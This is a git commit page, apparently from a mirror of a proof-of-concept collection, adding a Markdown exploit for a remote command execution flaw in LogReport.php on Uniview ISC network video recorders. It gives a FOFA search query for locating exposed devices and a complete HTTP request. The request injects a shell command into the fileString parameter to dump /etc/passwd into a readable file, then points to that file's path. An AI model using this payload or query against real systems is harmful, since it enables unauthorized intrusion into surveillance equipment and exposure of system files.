mirror of
https://github.com/wooluo/POC00.git
synced 2026-03-17 20:44:53 +08:00
Create 浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md
This commit is contained in:
parent
f76b8af986
commit
ce189bbea0
24
浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md
Normal file
24
浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞.md
Normal file
@ -0,0 +1,24 @@
|
||||
## 浙江宇视isc网络视频录像机LogReport.php存在远程命令执行漏洞
|
||||
|
||||
## fofa
|
||||
```
|
||||
body="Alarm" && body="白牌定制"
|
||||
```
|
||||
|
||||
## poc
|
||||
```
|
||||
GET /Interface/LogReport/LogReport.php?action=execUpdate&fileString=x;cat+/etc/passwd%3Echeck.txt HTTP/1.1
|
||||
Host:
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=f952f704362e34231e810533d889f5fb; logintime=-; devLanguage=zh-CN
|
||||
Upgrade-Insecure-Requests: 1
|
||||
```
|
||||

|
||||
|
||||
然后访问路径 :
|
||||
|
||||
/Interface/LogReport/check.txt
|
||||
Loading…
x
Reference in New Issue
Block a user